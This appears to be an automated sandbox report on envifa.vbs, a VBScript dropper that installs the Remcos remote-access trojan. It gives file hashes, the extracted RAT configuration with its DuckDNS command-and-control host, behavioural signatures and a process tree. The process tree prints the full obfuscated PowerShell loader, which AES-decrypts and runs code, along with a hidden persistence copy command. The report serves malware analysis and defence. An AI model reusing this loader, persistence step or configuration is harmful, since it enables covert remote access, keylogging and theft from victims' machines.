Analysis
-
max time kernel
73s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
05/12/2023, 18:38
Static task
static1
Behavioral task
behavioral1
Sample
envifa.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
envifa.vbs
Resource
win10v2004-20231127-en
General
-
Target
envifa.vbs
-
Size
159KB
-
MD5
5b0011526c3005e35e88002cfcf3dff8
-
SHA1
5b0b70c2857e84d0abe2b04b0593ccfc49395a8f
-
SHA256
043ca2ac861326e01d02af9599b54c8a23b781dda3e9f3c31166885a1f67e401
-
SHA512
4af5c688c4c971950724cd706d09d968973fc65f9b69bf5a969900771577b56799e33d3ca2dd0972ff78d06f4751d609711b19ee793c159189981ed07946d989
-
SSDEEP
3072:jk+jUIUfUPUgUgUgUgUgUgUgUgUgUgUgUgUgUgUgUgUVUPUdUgUgUgUgUgUgUgUo:XjUIUfUPUgUgUgUgUgUgUgUgUgUgUgUL
Malware Config
Extracted
remcos
RemoteHost
remccoss2023.duckdns.org:4576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-E5ZBB0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 14 4344 powershell.exe 30 4344 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4344 set thread context of 868 4344 powershell.exe 94 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000_Classes\Local Settings RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4344 powershell.exe 4344 powershell.exe 4816 powershell.exe 4816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 868 RegAsm.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 5056 wrote to memory of 4344 5056 WScript.exe 86 PID 5056 wrote to memory of 4344 5056 WScript.exe 86 PID 4344 wrote to memory of 4816 4344 powershell.exe 91 PID 4344 wrote to memory of 4816 4344 powershell.exe 91 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 4344 wrote to memory of 868 4344 powershell.exe 94 PID 868 wrote to memory of 4616 868 RegAsm.exe 110 PID 868 wrote to memory of 4616 868 RegAsm.exe 110 PID 868 wrote to memory of 4616 868 RegAsm.exe 110
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = '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';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\duwaletpzfdpdcsfjjsxg.vbs"4⤵PID:4616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5be710258455560d0ab88d15b88fce936
SHA18a6b3e951a3ae1d785ce550ec4439680a5b36ba9
SHA2569fe151131910e5a84eed25ead81db9227e14cc8f7dd9359c8c7e7ecafacd4b38
SHA512c73a26562bdbc5393f8d4691059b3fa0e5189f05ba989a7e9c9b458ec5dace531f659656eb584661c37e218d264d0518832b00fc36dcecb752ef17e1029552a1
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
2KB
MD569cf29b75442a46e0e7c3e91bbc375f2
SHA11c37e03a67e4bc203153a99d8eb9ed0b9390f7fa
SHA256db131cefcdef09f02d903695b9ca29b408a699bab1f029bba0aa7473e87cfcd7
SHA512508c07af418fcb9f12237d268825d93265a0d0c18f920551ba82be87609f58d6131b5861995793b8699d91c8cb49cee222f20e8f3ad83387e775828a75eab0eb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
544B
MD54196262905f64f1dd00381f882d1e2c4
SHA1325434edd2f6930f987de42e51228ca348745413
SHA2560b3cbde8778e4f47322ca017b5280f6eed3cd6f327b436eea4e91fbeb364a092
SHA512c3367ac15a473485aceafbe52aa591e33fb67dff21896b936173db78d2889f9ee200ce4b7d78ede67bc471433444dea1c4cb36013cda7f6f9f7df3416bb1aa73